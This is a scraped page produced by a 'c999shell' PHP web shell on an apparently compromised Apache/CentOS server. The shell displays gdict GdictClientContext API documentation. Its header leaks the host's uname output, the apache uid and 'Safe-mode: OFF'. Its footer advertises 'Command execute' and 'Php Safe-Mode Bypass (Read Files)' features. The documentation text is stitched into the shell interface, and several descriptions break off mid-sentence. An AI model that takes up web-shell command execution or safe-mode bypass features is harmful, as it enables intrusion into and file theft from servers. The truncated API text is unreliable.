Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /usr/share/gtk-doc/html/gdict/ drwxr-xr-x |
Viewing file: gdict-GdictClientContext.html (17.13 KB) -rw-r--r-- Select action/file-type: (+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
SynopsisGdictClientContextPrivate; #define GDICT_CLIENT_CONTEXT_ERROR enum GdictClientContextError; GQuark gdict_client_context_error_quark (void); GdictClientContext; GdictContext* gdict_client_context_new (const gchar *hostname, gint port); void gdict_client_context_set_hostname (GdictClientContext *context, const gchar *hostname); const gchar* gdict_client_context_get_hostname (GdictClientContext *context); void gdict_client_context_set_port (GdictClientContext *context, gint port); guint gdict_client_context_get_port (GdictClientContext *context); void gdict_client_context_set_client (GdictClientContext *context, const gchar *client); const gchar* gdict_client_context_get_client (GdictClientContext *context); DescriptionGdictClientContext is an implementation of the GdictContext interface. It uses the Dictionary Protocol as defined by the RFC 2229 in order to connect to a dictionary server. You should rarely instantiate this object directely: use an appropriate GdictSource instead. Detailsenum GdictClientContextErrortypedef enum { GDICT_CLIENT_CONTEXT_ERROR_SOCKET, GDICT_CLIENT_CONTEXT_ERROR_LOOKUP, GDICT_CLIENT_CONTEXT_ERROR_NO_CONNECTION, GDICT_CLIENT_CONTEXT_ERROR_SERVER_DOWN } GdictClientContextError; These identify the various errors that can occur while calling GdictClientContext functions. GdictClientContexttypedef struct { } GdictClientContext; The GdictClientContext struct contains private data only. gdict_client_context_new ()GdictContext* gdict_client_context_new (const gchar *hostname, gint port);
Creates a new GdictClientContext object for
gdict_client_context_set_hostname ()void gdict_client_context_set_hostname (GdictClientContext *context, const gchar *hostname);
Sets
gdict_client_context_get_hostname ()const gchar* gdict_client_context_get_hostname (GdictClientContext *context);
Gets the hostname of the dictionary server used by
gdict_client_context_set_port ()void gdict_client_context_set_port (GdictClientContext *context, gint port); Sets the port of the dictionary server to be used when connecting.
If
gdict_client_context_get_port ()guint gdict_client_context_get_port (GdictClientContext *context);
Gets the port of the dictionary server used by
gdict_client_context_set_client ()void gdict_client_context_set_client (GdictClientContext *context, const gchar *client);
Sets
gdict_client_context_get_client ()const gchar* gdict_client_context_get_client (GdictClientContext *context);
Gets the client name used by
|
:: Command execute :: | |
:: Shadow's tricks :D :: | |
Useful Commands
|
:: Preddy's tricks :D :: | |
Php Safe-Mode Bypass (Read Files)
|
--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0099 ]-- |